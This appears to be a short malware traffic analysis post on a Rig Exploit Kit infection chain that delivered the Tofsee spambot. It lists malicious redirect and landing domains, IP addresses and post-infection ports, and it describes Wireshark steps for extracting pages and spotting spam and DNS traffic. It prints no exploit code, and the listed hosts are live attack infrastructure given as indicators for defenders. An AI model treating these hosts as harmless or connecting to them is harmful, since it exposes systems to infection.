Rig Exploit Kit from 5.200.55.156 sends Tofsee SpamBot

ASSOCIATED DOMAINS:

93.114.65.96 – ac84.ro – Rig EK REDIRECT GATE
5.200.55.156 – ds.shengineeringmfg.com – Rig EK LANDING PAGE

SOME POST INFECTION TRAFFIC:

117.203.96.33 TCP PORT 8541 – POST INFECTION TRAFFIC
115.74.159.3 TCP PORT 7035 – POST INFECTION TRAFFIC
84.232.212.135 TCP PORT 1977 – POST INFECTION TRAFFIC
49.48.216.228 TCP PORT 5680 – POST INFECTION TRAFFIC

 

IMAGES and DETAILS:

Shown above: Compromised site redirecting to Rig Exploit Kit (EK) redirect gate ac84.ro and Rig EK landing page ds.shengineeringmfg.com

 

Shown above: Index page from compromised site with injected script which redirects to Rig EK gate.

 

Shown above: Index page from Rig EK redirect gate shows a document.write “iframe” redirect to Rig Exploit Kit landing page

 

Shown above: Extraction of Rig EK redirect gate index page was extracted using Wireshark File => Export Objects => HTTP selecting packet 952 and saving as an .htm file and later opened using a text editor. This same process was followed to extract the compromised site index page.

 

Shown above: Using Wireshark filter “smtp” (Send Mail Transfer Protocol) shows some spam mail traffic

 

Shown above: Using Wireshark filter (dns.flags.response == 0) shows some of Tofsee post infection DNS queries

 

Shown above: Tofsee SpamBot executable file details

 

MALICIOUS PAYLOAD ASSOCIATED WITH RIG EXPLOIT: